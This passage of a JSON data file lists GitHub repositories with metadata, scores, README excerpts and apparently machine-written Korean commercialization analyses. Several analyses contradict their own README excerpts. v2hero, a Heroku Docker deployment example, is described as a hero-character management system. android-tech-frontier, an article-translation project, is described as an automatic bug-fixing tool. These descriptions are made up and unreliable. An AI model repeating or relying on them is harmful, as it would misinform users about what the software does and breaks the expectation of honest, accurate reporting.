much","composite_score":0.5483,"license_safety_tag":"safe"},{"name":"Snowflake-Labs/sfguide-data-engineering-with-snowpark-python","github_url":"https://github.com/Snowflake-Labs/sfguide-data-engineering-with-snowpark-python","stars":150,"language":"Python","license":"Apache-2.0","abandonment_months":16,"description":"","readme_excerpt":"","composite_score":0.5483,"license_safety_tag":"safe"},{"name":"hongyangAndroid/baseAdapter","github_url":"https://github.com/hongyangAndroid/baseAdapter","stars":6,"language":"Java","license":"Apache-2.0","abandonment_months":56,"description":"# honeyangAndroid/baseAdapter 평가 보고서\n\n## 왜 보물인가\n안드로이드 앱에서 목록 화면을 만들 때 반복적인 코딩 작업을 줄여주는 재사용 가능한 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 모바일 앱 개발 플랫폼에 내장하여 앱 개발자들의 생산성을 높이는 기능으로 판매\n2. **내부 업무 도구**: 안드로이드","readme_excerpt":"# base-adapter\r\nAndroid 万能的Adapter for ListView,RecyclerView,GridView等，支持多种Item类型的情况。\r\n\r\n\r\n## 引入\r\n\r\n### ForRecyclerView\r\n\r\n```\r\ncompile 'com.zhy:base-rvadapter:3.0.3'\r\n```\r\n\r\n### ForListView\r\n\r\n```\r\ncompile 'com.zhy:base-adapter:3.0.3'\r\n```\r\n\r\n\r\n## 使用\r\n\r\n##（1）简单的数据绑定(ListView与其使用方式一致)\r\n\r\n首先看我们最常用的单种Item的书写方式：\r\n\r\n```\r\nmRecyclerView.setAdapter(new CommonAdapter<String>(this, R.layout.item_list, mDatas)\r\n{\r\n    @Override\r\n    public void convert(ViewHolder holder, String s)\r\n    {\r\n        holder.setText(R.id.id_item_list_title, s);\r\n    }\r\n});\r\n```\r\n是不是相当方便，在convert方法中完成数据、事件绑定即可。\r\n\r\n\r\n只需要简单的将Adapter继承CommonAdapter，复写convert方法即可。省去了自己编写ViewHolder等大量的重复的代码。\r\n\r\n* 可以通过holder.getView(id)拿到任何控件。\r\n* ViewHolder中封装了大量的常用的方法，比如holder.setText(id,text)，holder.setOnClickListener(id,listener)等，可以支持使用。\r\n\r\n效果图：\r\n\r\n<img src=\"screenshot/single.png\" width=\"320px\"/>\r\n\r\n##（2）多种ItemViewType(ListView与其使用方式一致)\r\n\r\n对于多中itemviewtype的处理参考：https://github.com/sockeqwe/AdapterDelegates ，具有极高的扩展性。\r\n\r\n\r\n```\r\nMultiItemT","composite_score":0.5478,"license_safety_tag":"safe"},{"name":"OpenFlutter/Flutter-Notebook","github_url":"https://github.com/OpenFlutter/Flutter-Notebook","stars":5,"language":"Dart","license":"Apache-2.0","abandonment_months":62,"description":"# OpenFlutter/Flutter-Notebook 분석\n\n## 왜 보물인가\n스마트폰 앱 개발을 배우고 싶은 사람들을 위해 실제 동작하는 예제들을 모아둔 실용적인 학습 자료집입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 앱 개발 초보자 대상 유료 강좌로 판매하여 수강료 수익화\n2. **기업 내부 교육**: IT 회사의 신입사원 온","readme_excerpt":"### You can select the language by pressing on the options between these \n[中文版](https://github.com/OpenFlutter/Flutter-Notebook/blob/master/README.md) | [English](https://github.com/OpenFlutter/Flutter-Notebook/blob/master/readme_english.md)\n![](./image/logo.png)\n## flutter_notebook有什么\nflutter_note_book有许多flutter相关功能demo的集合，它能够帮助您快速学习一些零碎的知识，本项目将会不定期更新。\n\n如果您觉得有用的话可以Watch该项目，之后更新会自动通知您。\n## 收集更多优秀样例\n### 本项目大多为了提供一些问题的解决思路，如果您有更好的实现方式或者好的创意，欢迎提交PR!\n## 如何下载单个项目\n将单个项目下url复制粘贴到下面这个中，将会自动生成下载文件：\n\n[DownGit](https://minhaskamal.github.io/DownGit/#/home) \n\n## 目前包含以下demo：\n### 官方控件系列\n#### 视图\n- [BottomNavigationBar底部导航](https://github.com/Vadaski/Vadaski-flutter_note_book/tree/master/mecury_project/example/flutter_bottomnavigationbar)\n- [BottomAppBar底部导航](https://github.com/Vadaski/Vadaski-flutter_note_book/tree/master/mecury_project/example/bottom_appbar_demo)\n- [自定义路由样式](https://github.com/OpenFlutter/Flutter-Notebook/tree/master/mecury_project/example/custom_router_transition)\n- [高斯模糊（毛玻璃）](http","composite_score":0.5475,"license_safety_tag":"safe"},{"name":"zukahai/Confess-Crush","github_url":"https://github.com/zukahai/Confess-Crush","stars":9,"language":"JavaScript","license":"unknown","abandonment_months":22,"description":"# Confess-Crush 저장소 분석\n\n## 왜 보물인가\n익명으로 좋아하는 사람에게 마음을 전할 수 있는 앱으로, 용기 내기 힘든 고백을 쉽고 안전하게 도와주는 서비스입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대학교/고등학교를 대상으로 월 구독료를 받고 학내 고백 플랫폼 운영\n2. **내부 업무 도구**: 회사 내부 익명 메시징 ","readme_excerpt":"## <p align=\"center\"> Tạo một trang web tỏ tình không cần code </p>\n\n![confess-crush\n](https://socialify.git.ci/zukahai/confess-crush/image?description=1&forks=1&issues=1&language=1&owner=1&pattern=Brick%20Wall&pulls=1&stargazers=1&theme=Dark)\n\n<hr>\n\n## <p align=\"center\"> Hướng dẫn chi tiết </p>\n\n* Hướng dẫn làm trang web \n  * [Bước 1: Đăng nhập Github](#bước-1-đăng-nhập-github) </br>\n  * [Bước 2: Fork project](#bước-2-fork-project) </br>\n  * [Bước 3: Chỉnh sửa trang web](#bước-3-chỉnh-sửa-web-theo-ý-của-bạn) </br>\n  * [Bước 4: Tạo trang web](#bước-4-tạo-trang-web) </br>\n* Video Hướng dẫn\n  * [Video hướng dẫn](#-video-hướng-dẫn-)\n* Xem sản phẩm\n  * [Xem sản phẩm](#-ấn-vào-đây-để-xem-kết-quả-tương-tự-của-bạn-)\n* Câu hỏi và phản hồi\n  * [Câu hỏi và phản hồi](#-câu-hỏi-và-phản-hồi-)\n\nLưu ý: Nếu bạn đang sử dụng điện thoại thì bạn cần mở hướng dẫn này ở dưới dạng cho máy tính bằng cách mở trang web này trong trình duyệt chorme và làm theo hình bên dưới:\n<p align=\"center\"> <img src=\"/images","composite_score":0.5474,"license_safety_tag":"unknown"},{"name":"naturomics/CapsNet-Tensorflow","github_url":"https://github.com/naturomics/CapsNet-Tensorflow","stars":10,"language":"Python","license":"Apache-2.0","abandonment_months":90,"description":"# CapsNet-Tensorflow 상용화 분석\n\n## 왜 보물인가\n이미지를 더 똑똑하게 인식하는 인공지능 기술로, 사람처럼 그림의 각도나 위치 변화에도 강하게 대응할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 의료 영상(X-ray, CT) 자동 분석 웹 플랫폼\n- **내부 업무 도구**: 제조업체의 불량품 검사 자동화 시스템\n","readme_excerpt":"# CapsNet-Tensorflow\n\n[![Contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=plastic)](CONTRIBUTING.md)\n[![License](https://img.shields.io/badge/license-Apache%202.0-blue.svg?style=plastic)](https://opensource.org/licenses/Apache-2.0)\n[![Gitter](https://img.shields.io/gitter/room/nwjs/nw.js.svg?style=plastic)](https://gitter.im/CapsNet-Tensorflow/Lobby)\n\nA Tensorflow implementation of CapsNet based on Geoffrey Hinton's paper [Dynamic Routing Between Capsules](https://arxiv.org/abs/1710.09829)\n\n![capsVSneuron](imgs/capsuleVSneuron.png)\n\n> **Notes:**\n> 1. The current version supports [MNIST](http://yann.lecun.com/exdb/mnist/) and [Fashion-MNIST](https://github.com/zalandoresearch/fashion-mnist) datasets. The current test accuracy for MNIST is `99.64%`, and Fashion-MNIST `90.60%`, see details in the [Results](https://github.com/naturomics/CapsNet-Tensorflow#results) section\n> 2. See [dist_version](dist_version) for multi-GPU support\n> 3. [Here(知","composite_score":0.5459,"license_safety_tag":"safe"},{"name":"DrkSephy/es6-cheatsheet","github_url":"https://github.com/DrkSephy/es6-cheatsheet","stars":29,"language":"JavaScript","license":"unknown","abandonment_months":44,"description":"# ES6 Cheatsheet 분석 보고서\n\n## 왜 보물인가\n최신 자바스크립트 문법을 간단하게 정리해둔 참고자료로, 개발자들이 빠르게 필요한 정보를 찾을 수 있어 학습과 실무 생산성을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 초보 개발자 대상 유료 튜토리얼이나 인증서 과정에 커리큘럼 자료로 통합\n2. **개발팀","readme_excerpt":"# es6-cheatsheet\n\nA cheatsheet containing ES2015 [ES6] tips, tricks, best practices and code\nsnippet examples for your day to day workflow. Contributions are welcome!\n\n## Table of Contents\n\n- [var versus let / const](#var-versus-let--const)\n- [Replacing IIFEs with Blocks](#replacing-iifes-with-blocks)\n- [Arrow Functions](#arrow-functions)\n- [Strings](#strings)\n- [Destructuring](#destructuring)\n- [Modules](#modules)\n- [Parameters](#parameters)\n- [Classes](#classes)\n- [Symbols](#symbols)\n- [Maps](#maps)\n- [WeakMaps](#weakmaps)\n- [Promises](#promises)\n- [Generators](#generators)\n- [Async Await](#async-await)\n- [Getter/Setter functions](#getter-and-setter-functions)\n- [License](#license)\n\n## var versus let / const\n\n> Besides `var`, we now have access to two new identifiers for storing values\n—`let` and `const`. Unlike `var`, `let` and `const` statements are not hoisted\nto the top of their enclosing scope.\n\nAn example of using `var`:\n\n```javascript\nvar snack = 'Meow Mix';\n\nfunction getFood(","composite_score":0.5452,"license_safety_tag":"unknown"},{"name":"surmon-china/vue-video-player","github_url":"https://github.com/surmon-china/vue-video-player","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":46,"description":"# Vue Video Player 저장소 분석\n\n## 왜 보물인가\n웹사이트에 동영상을 쉽게 올리고 재생할 수 있게 해주는 도구로, 유튜브처럼 영상 콘텐츠를 서비스하려는 사람들의 필수품입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 강의 플랫폼**: 강사들이 학생들을 위해 강의 영상을 올리고 관리할 수 있는 서비스\n2. **기업 교육용 내부 도구**: 직","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://videojs.com#gh-dark-mode-only\" target=\"_blank\">\n    <br />\n    <img height=\"52px\" src=\"/videojs-logo.png\" />\n  </a>\n</p>\n\n# videojs-player\n\n[![GitHub stars](https://img.shields.io/github/stars/surmon-china/videojs-player.svg?style=for-the-badge)](https://github.com/surmon-china/videojs-player/stargazers)\n&nbsp;\n[![GitHub issues](https://img.shields.io/github/issues/surmon-china/videojs-player.svg?style=for-the-badge)](https://github.com/surmon-china/videojs-player/issues)\n&nbsp;\n[![GitHub forks](https://img.shields.io/github/forks/surmon-china/videojs-player.svg?style=for-the-badge)](https://github.com/surmon-china/videojs-player/network)\n&nbsp;\n[![Test Codecov](https://img.shields.io/codecov/c/github/surmon-china/videojs-player?style=for-the-badge)](https://codecov.io/gh/surmon-china/videojs-player)\n&nbsp;\n[![license](https://img.shields.io/github/license/mashape/apistatus.svg?style=for-the-badge)](/LICENSE)\n\n[![@videojs-player/vue](https://img.sh","composite_score":0.5451,"license_safety_tag":"safe"},{"name":"onplus/v2hero","github_url":"https://github.com/onplus/v2hero","stars":7,"language":"Dockerfile","license":"MIT","abandonment_months":59,"description":"# onplus/v2hero 분석 보고서\n\n## 왜 보물인가\n영웅 캐릭터 관리 시스템으로, 게임이나 앱에서 복잡한 캐릭터 데이터를 쉽게 다룰 수 있게 해주는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 서비스**: RPG 게임의 캐릭터 성장, 장비 관리 시스템을 구축하는 SaaS로 제공\n2. **게임사 내부 도구**: 개발사가 게임 밸런싱","readme_excerpt":"# v2hero  [![Build Status](https://travis-ci.org/onplus/v2hero.svg?branch=core-3.1)](https://travis-ci.org/onplus/v2hero)\n本项目是一个[利用Travis-CI部署Docker到Heroku](https://github.com/onplus/v2hero/tree/core-3.8) 的学习示例。\n\n如果为您的学习提供了帮助，欢迎给一个Star ^_^\n\n* 快捷部署\n   [![](https://www.herokucdn.com/deploy/button.png)](https://heroku.com/deploy?template=https://github.com/onplus/v2hero/tree/core-latest)\n \n* 提问&建议\n   https://github.com/onplus/v2hero/issues\n   发起issue前请尽量先使用文档和搜索\n\n* 相关项目\n   https://github.com/onplus/shadowsocks-heroku\n\n* 实现参考 \n   - https://github.com/v2ray/v2ray-core\n   - https://github.com/wangyi2005/v2ray\n   - Heroku \n      - https://devcenter.heroku.com/articles/container-registry-and-runtime\n      - https://devcenter.heroku.com/articles/build-docker-images-heroku-yml\n","composite_score":0.5449,"license_safety_tag":"safe"},{"name":"aws/amazon-freertos","github_url":"https://github.com/aws/amazon-freertos","stars":39,"language":"C","license":"MIT","abandonment_months":43,"description":"# AWS Amazon FreeRTOS 분석\n\n## 왜 보물인가\n아마존(Amazon)이 만든 작은 기기들을 쉽게 제어할 수 있는 무료 기본 프로그램으로, IoT 기기 개발의 진입 장벽을 획기적으로 낮춰줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: IoT 기기 관리 플랫폼 - 냉장고, 스마트폰, 시계 등 스마트 기기 제어 서비스 구축\n2.","readme_excerpt":"# ![image](https://user-images.githubusercontent.com/56273942/202568467-0ee721bb-1424-4efd-88fc-31b4f2a59dc6.png) DEPRECATED\n\n## Announcement:\nAs of November 18th, 2022, this repository is deprecated. The contents of this repository will remain available but we will no longer provide updates or accept new contributions and pull requests. We recommend you start [here](https://docs.aws.amazon.com/freertos/latest/userguide/freertos-getting-started-modular.html) for creating a new project. If you have an existing FreeRTOS project based on this repository, see the [migration guide](https://docs.aws.amazon.com/freertos/latest/userguide/github-repo-migration.html). \n\nOver the years, AWS has improved the modularity of the FreeRTOS libraries and repository structure to make it easier for you to build and update FreeRTOS-based projects. This repository deprecation aligns with some of these significant initiatives:\n*   We decomposed libraries to include them in their individual repositories and r","composite_score":0.5448,"license_safety_tag":"safe"},{"name":"CharlesPikachu/Games","github_url":"https://github.com/CharlesPikachu/Games","stars":9,"language":"Python","license":"Apache-2.0","abandonment_months":22,"description":"# CharlesPikachu/Games 분석\n\n## 왜 보물인가\n게임 개발에 필요한 핵심 기능들을 미리 만들어둔 코드 모음으로, 개발자들이 처음부터 다시 만드는 대신 이미 완성된 부품을 조립하듯 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 게임 개발 SaaS 플랫폼**\n게임 개발 초보자들이 쉽게 게임을 만들 수 있는 웹 기반 게임 빌더로 판","readme_excerpt":"<div align=\"center\">\n  <img src=\"./docs/logo.png\" width=\"600\"/>\n</div>\n<br />\n\n[![docs](https://img.shields.io/badge/docs-latest-blue)](https://cpgames.readthedocs.io/zh/latest/)\n[![PyPI - Python Version](https://img.shields.io/pypi/pyversions/cpgames)](https://pypi.org/project/cpgames/)\n[![PyPI](https://img.shields.io/pypi/v/cpgames)](https://pypi.org/project/cpgames)\n[![license](https://img.shields.io/github/license/CharlesPikachu/Games.svg)](https://github.com/CharlesPikachu/Games/blob/master/LICENSE)\n[![PyPI - Downloads](https://pepy.tech/badge/cpgames)](https://pypi.org/project/cpgames/)\n[![PyPI - Downloads](https://img.shields.io/pypi/dm/cpgames?style=flat-square)](https://pypi.org/project/cpgames/)\n[![issue resolution](https://isitmaintained.com/badge/resolution/CharlesPikachu/Games.svg)](https://github.com/CharlesPikachu/Games/issues)\n[![open issues](https://isitmaintained.com/badge/open/CharlesPikachu/Games.svg)](https://github.com/CharlesPikachu/Games/issues)\n\nDocuments: http","composite_score":0.5444,"license_safety_tag":"safe"},{"name":"MarkerHub/vueblog","github_url":"https://github.com/MarkerHub/vueblog","stars":9,"language":"Java","license":"Apache-2.0","abandonment_months":41,"description":"# MarkerHub/vueblog 평가 분석\n\n## 왜 보물인가\n누구나 쉽게 자신만의 블로그를 만들고 운영할 수 있는 간편한 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **개인 블로그 SaaS**: 글쓰기만 원하는 사용자를 위해 월 구독 서비스로 제공\n2. **기업 내부 지식 관리 도구**: 회사 직원들이 업무 노하우를 공유하고 정리하는 플랫폼\n3. *","readme_excerpt":"> **项目：vueblog**\n>\n> **公众号：MarkerHub**\n\n### 介绍\n\n一个基于SpringBoot + Vue开发的前后端分离博客项目，带有超级详细开发文档和讲解视频。还未接触过vue开发，或者前后端分离的同学，学起来哈。别忘了给vueblog一个star！感谢\n\n### 技术栈：\n\n![](https://oscimg.oschina.net/oscnet/up-4626cb696c003e36c4515e77adc7632c6ed.png)\n\n### 项目效果：\n\n![图片](https://image-1300566513.cos.ap-guangzhou.myqcloud.com/upload/images/20200613/b1c18a3fe33544578971c3a15d0d9425.png)\n\n![图片](https://image-1300566513.cos.ap-guangzhou.myqcloud.com/upload/images/20200613/5e291faeaef648af87b8b33483eef5bd.png)\n\n\n### 项目文档：\n\n开发文档：https://juejin.im/post/5ecfca676fb9a04793456fb8\n\nvue入门视频：https://www.bilibili.com/video/BV125411W73W/\n\n**vueblog讲解视频：** https://www.bilibili.com/video/BV1PQ4y1P7hZ/\n\n关注我的B站，后续陆续还有\n\n* 前后端分离类百度搜索引擎项目\n* 即时聊天等项目\n\n等项目分享出来哈！\n\n**更多项目请关注公众号：MarkerHub**\n\n![MarkerHub](https://camo.githubusercontent.com/061df651b4fcfec5d258dc2beb78f441b9360e42/68747470733a2f2f696d6167652d313330303536363531332e636f732e61702d6775616e677a686f752e6d7971636c6f75642e636f6d2f6d696e652f4d61726b65724875622e6a7067)\n","composite_score":0.5443,"license_safety_tag":"safe"},{"name":"yanzhenjie/AndPermission","github_url":"https://github.com/yanzhenjie/AndPermission","stars":7,"language":"Java","license":"Apache-2.0","abandonment_months":29,"description":"# AndPermission 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱이 사용자의 위치, 카메라, 연락처 등 민감한 정보에 접근할 때 필요한 허락 과정을 간단하게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 사진 편집 앱이 사용자 갤러리 접근 권한을 요청할 때 필요한 허락 창을 깔끔하게 표시\n2. **내부","readme_excerpt":"﻿# AndPermission\n1. Request for runtime permissions.  \n2. Share private files.  \n3. Request to install unknown source apk.  \n  `android.permission.REQUEST_INSTALL_PACKAGES`\n4. Request to draw at the top of other apps.  \n  `android.permission.SYSTEM_ALERT_WINDOW`\n5. Request to show notifications.  \n6. Request to access notifications.  \n  `android.permission.BIND_NOTIFICATION_LISTENER_SERVICE`\n7. Request to modify system setting.  \n  `android.permission.WRITE_SETTINGS`\n\n```java\nAndPermission.with(this)\n  .runtime()\n  .permission(Permission.Group.STORAGE)\n  .onGranted(permissions -> {\n    // Storage permission are allowed.\n  })\n  .onDenied(permissions -> {\n    // Storage permission are not allowed.\n  })\n  .start();\n```\n\nFor documentation and additional information see [the website](https://yanzhenjie.com/AndPermission).\n\n## Download\nIt only supports androidx, add dependencies in your gradle:\n\n```groovy\nimplementation 'com.yanzhenjie:permission:2.0.3'\n```\n\nAndPermission requires at minimum","composite_score":0.5442,"license_safety_tag":"safe"},{"name":"YTVanced/VancedManager","github_url":"https://github.com/YTVanced/VancedManager","stars":15,"language":"Kotlin","license":"GPL-3.0","abandonment_months":51,"description":"# YTVanced/VancedManager 분석\n\n## 왜 보물인가\n유튜브를 더 편하게 사용할 수 있도록 도와주는 도구의 설치와 관리를 자동화한 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 유튜브 확장 기능을 구독 기반으로 제공하는 웹 서비스\n2. **내부 업무 도구**: 기업의 영상 관리 시스템에 통합하여 직원들의 유튜브 사","readme_excerpt":"# Vanced Manager\n[![Github All Releases](https://img.shields.io/github/downloads/YTVanced/VancedManager/total.svg?style=for-the-badge)](https://github.com/YTVanced/VancedManager/releases/latest) [![Github All Releases](https://img.shields.io/github/release/YTVanced/VancedManager.svg?style=for-the-badge)](https://github.com/YTVanced/VancedManager/releases/latest)\n\n# **Now discontinued https://twitter.com/YTVanced/status/1503052250268286980**\n\nHi, when we released Vanced 15.05.54, people were upset because it used the .apks format, which was way harder to install than a traditional .apk file. Even though we wrote clear instructions on how to install the new Vanced build, people still couldn't figure it out.  \nThen we thought, \"why don't we make a manager for vanced, which will download, update and uninstall Vanced and MicroG, have an easy and understandable UI and be less than 10mb?\" and that's how Vanced Manager was born.  \n  \nAfter 3 months of development, we are finally ready to intro","composite_score":0.5442,"license_safety_tag":"restricted"},{"name":"ximsfei/Android-skin-support","github_url":"https://github.com/ximsfei/Android-skin-support","stars":8,"language":"Java","license":"mit","abandonment_months":70,"description":"# Android-skin-support 상용화 분석\n\n## 왜 보물인가\n안드로이드 앱의 외형을 사용자가 원하는 색상이나 디자인으로 자유롭게 바꿀 수 있는 기술로, 앱 개발사들이 별도 개발 없이 다양한 테마 기능을 제공할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **테마 커스터마이징 SaaS**: 기업 앱 개발자들을 위해 드래그앤드롭으로 테마를 만들고","readme_excerpt":"# Android-skin-support\n\n中文 | [In English](docs/README.md) \n\n[![skin-support](https://img.shields.io/badge/release-v4.0.5-green.svg)](http://jcenter.bintray.com/skin/support)\n![build](https://img.shields.io/badge/build-passing-green.svg)\n![license](https://img.shields.io/badge/license-mit-blue.svg)\n\n* [介绍](#介绍)\n  * [功能](#功能)\n  * [TODO](#todo)\n  * [目录结构](#目录结构)\n* [Demo](#demo)\n* [框架用法](#用法)\n  * [导入](#导入)\n  * [使用](#使用)\n    * [初始化](#在application的oncreate中初始化)\n    * [皮肤开关](#皮肤开关)\n    * [加载插件皮肤库](#加载插件皮肤库)\n    * [自定义view换肤](#自定义view换肤)\n  * [应用内换肤](#应用内换肤)\n  * [插件式换肤](#插件式换肤)\n    * [新建皮肤工程](#新建android-application工程)\n    * [添加皮肤资源](#将需要换肤的资源放到res目录下同名资源)\n    * [生成皮肤插件](#打包生成apk-即为皮肤包)\n    * [加载皮肤插件](#加载皮肤插件)\n  * [自定义加载策略](#自定义加载策略)\n    * [自定义sdcard路径](#自定义sdcard路径)\n    * [zip包中加载资源](#zip包中加载资源)\n  * [动态设置资源](#动态设置资源)\n    * [动态设置颜色](#动态设置颜色)\n    * [动态设置图片](#动态设置图片)\n  * [获取当前使用皮肤](#获取当前使用皮肤)\n* [AlertDialog换肤](docs/AlertDialog.md)\n* [更新日志](docs/ChangeLog.md)\n  * [skin-support 更新日志](docs/ChangeLog.","composite_score":0.5441,"license_safety_tag":"safe"},{"name":"aws-samples/aws-workshop-for-kubernetes","github_url":"https://github.com/aws-samples/aws-workshop-for-kubernetes","stars":8,"language":"Shell","license":"Apache-2.0","abandonment_months":25,"description":"# AWS 쿠버네티스 워크숍 저장소 분석\n\n## 왜 보물인가\n클라우드에서 서버를 효율적으로 관리하는 방법을 배울 수 있는 실습 교재로, AWS가 직접 만든 신뢰할 수 있는 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n- **기업 내부 교육 플랫폼**: 신입 직원이나 개발팀을 위한 클라우드 운영 교육 자료로 활용\n- **온라인 교육 서비스**: 클라우드 기술","readme_excerpt":"= Kubernetes the AWSome Way!\n:icons:\n:linkattrs:\n:imagesdir: resources/images\n\nimage:stop_sign01.png[align=\"left\",width=120]\n\n**This content is outdated and is no longer maintained. Please go to https://www.eksworkshop.com/ for newest EKS tutorials!**\n\nimage:kubernetes-aws-smile.png[alt=\"kubernetes and aws logos\", align=\"left\",width=420]\n\nThis is a self-paced workshop designed for Development and Operations teams who would like to leverage Kubernetes on Amazon Web Services (AWS).\n\nThis workshop provides instructions to create, manage, and scale a Kubernetes cluster on AWS, as well as how to deploy applications, scale them, run stateless and stateful containers, perform service discovery between different microservices, and other similar concepts.\n\nIt also shows deep integration with several AWS technologies.\n\nWe recommend at least 2 hours to complete the workshop.\n\nClick the button below to start!\n\nimage::button-start-standard.png[link=01-path-basics/101-start-here/]\n\n== Extended Paths","composite_score":0.544,"license_safety_tag":"safe"},{"name":"fossasia/susi_android","github_url":"https://github.com/fossasia/susi_android","stars":12,"language":"Kotlin","license":"Apache-2.0","abandonment_months":43,"description":"# SUSI Android 저장소 분석\n\n## 왜 보물인가\n음성으로 질문하면 답해주는 인공지능 어시스턴트를 누구나 쉽게 만들고 개선할 수 있는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **음성 비서 앱 서비스**: 스마트폰 앱으로 사용자들이 음성 질문을 하면 답변을 얻는 구독 서비스\n2. **기업 내부 질의응답 시스템**: 회사의 자주 묻는","readme_excerpt":"# SUSI.AI Android App\n\nDev [![CircleCI](https://circleci.com/gh/fossasia/susi_android.svg?style=svg&branch=development)](https://circleci.com/gh/fossasia/susi_android)\nMaster [![CircleCI](https://circleci.com/gh/fossasia/susi_android/tree/master.svg?style=svg)](https://circleci.com/gh/fossasia/susi_android/tree/master)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/6ec0032213274fa0a07574919928c6a6)](https://www.codacy.com/app/harshithdwivedi/susi_android?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=fossasia/susi_android&amp;utm_campaign=Badge_Grade)\n[![Preview the app](https://img.shields.io/badge/Preview-Appetize.io-orange.svg)](https://appetize.io/app/mbpprq4xj92c119j7nxdhttjm0)\n[![Gitter](https://badges.gitter.im/fossasia/susi_android.svg)](https://gitter.im/fossasia/susi_android?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n[![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](mailto:susiai@googlegroups.com)\n[![Twi","composite_score":0.544,"license_safety_tag":"safe"},{"name":"Jam3/math-as-code","github_url":"https://github.com/Jam3/math-as-code","stars":5,"language":"","license":"mit","abandonment_months":51,"description":"# Jam3/math-as-code 분석 보고서\n\n## 왜 보물인가\n수학 공식을 프로그래밍 코드로 쉽게 변환할 수 있는 가이드북으로, 수학자와 개발자 사이의 소통 장벽을 낮춰줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 온라인 수학 교육 플랫폼에서 학생들이 수학 개념을 코드로 직접 구현하고 시각화할 수 있는 학습 도구 제공\n2. **내","readme_excerpt":"# math-as-code\n\n>[Chinese translation (中文版)](./README-zh.md)  \n>[Python version (English)](./PYTHON-README.md)\n\nThis is a reference to ease developers into mathematical notation by showing comparisons with JavaScript code.\n\nMotivation: Academic papers can be intimidating for self-taught game and graphics programmers. :) \n\nThis guide is not yet finished. If you see errors or want to contribute, please [open a ticket](https://github.com/Jam3/math-as-code/issues) or send a PR.\n\n> **Note**: For brevity, some code examples make use of [npm packages](https://www.npmjs.com/). You can refer to their GitHub repos for implementation details.\n\n\n\n# foreword\n\nMathematical symbols can mean different things depending on the author, context and the field of study (linear algebra, set theory, etc). This guide may not cover *all* uses of a symbol. In some cases, real-world references (blog posts, publications, etc) will be cited to demonstrate how a symbol might appear in the wild.\n\nFor a more complete ","composite_score":0.5439,"license_safety_tag":"safe"},{"name":"hehonghui/android-tech-frontier","github_url":"https://github.com/hehonghui/android-tech-frontier","stars":6,"language":"","license":"apache-2.0","abandonment_months":65,"description":"# android-tech-frontier 상용화 분석\n\n## 왜 보물인가\n안드로이드 앱 개발 시 발생하는 버그와 오류를 자동으로 찾아내고 수정해주는 기술로, 앱 개발자의 개발 시간을 대폭 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 앱 개발사 대상 SaaS 서비스**\n- 월 구독료를 내고 개발 중인 앱의 버그를 자동으로 검사하고 수정 제안을","readme_excerpt":"# Android开发技术前线 ( android-tech-frontier )\n\n> 一个定期翻译、发布国内外Android优质的技术、开源库、软件架构设计、测试等文章的开源项目,让我们的技术跟上国际步伐。        \n> 我们翻译的文章在能够联系到作者的情况下都会在获得作者授权后进行翻译，并且公开发布。发布的文章中都会保留原文链接、作者名，如有相关的版权协议我们也会一并附上。目前已经联系到的作者列表请参考[授权文档](authorization.md);\n\n---------\n\n[Android App内存泄漏自动分析工具 - MMAT发布](https://github.com/hehonghui/mmat)\n\n\n## 可阅读文章列表\n\n* [请移步到wiki](https://github.com/bboyfeiyu/android-tech-frontier/wiki)\n\n\n## 其他学习资源\n* [Android 源码设计模式分析 地址](https://github.com/simple-android-framework-exchange/android_design_patterns_analysis)\n* [Android优秀学习资料整理](the-bad-guys/)\n* [软件架构模式](https://raw.githubusercontent.com/bboyfeiyu/android-tech-frontier/master/software-architecture-patterns/%E8%BD%AF%E4%BB%B6%E6%9E%B6%E6%9E%84%E6%A8%A1%E5%BC%8F.pdf)\n\n\n## 版权信息\n<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/4.0/\"><img alt=\"知识共享许可协议\" style=\"border-width:0\" src=\"https://i.creativecommons.org/l/by-nc-sa/4.0/88x31.png\" /></a><br />该项目下的所有作品由<a xmlns:cc=\"http://creativecommons.org/ns#\" href=\"https:/","composite_score":0.5436,"license_safety_tag":"safe"},{"name":"shreys7/django-todo","github_url":"https://github.com/shreys7/django-todo","stars":154,"language":"Python","license":"Apache-2.0","abandonment_months":23,"description":"","readme_excerpt":"","composite_score":0.5435,"license_safety_tag":"safe"},{"name":"aksnzhy/xlearn","github_url":"https://github.com/aksnzhy/xlearn","stars":60,"language":"C++","license":"Apache-2.0","abandonment_months":33,"description":"# xlearn 저장소 분석\n\n## 왜 보물인가\n기계학습 모델의 정확도를 높이는 오픈소스 라이브러리로, 데이터 분석이 필요한 많은 기업들이 더 정확한 예측을 할 수 있도록 도와줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 신용카드 부정거래 탐지 시스템을 제공하는 금융 회사가 xlearn을 통해 더 정확한 판별 능력을 갖춘 서비스 제공\n- ","readme_excerpt":"<img src=\"https://github.com/aksnzhy/xLearn/raw/master/img/xlearn_logo.png\" width = \"400\"/>\n\n[![Hex.pm](https://img.shields.io/hexpm/l/plug.svg)](./LICENCE)\n[![Project 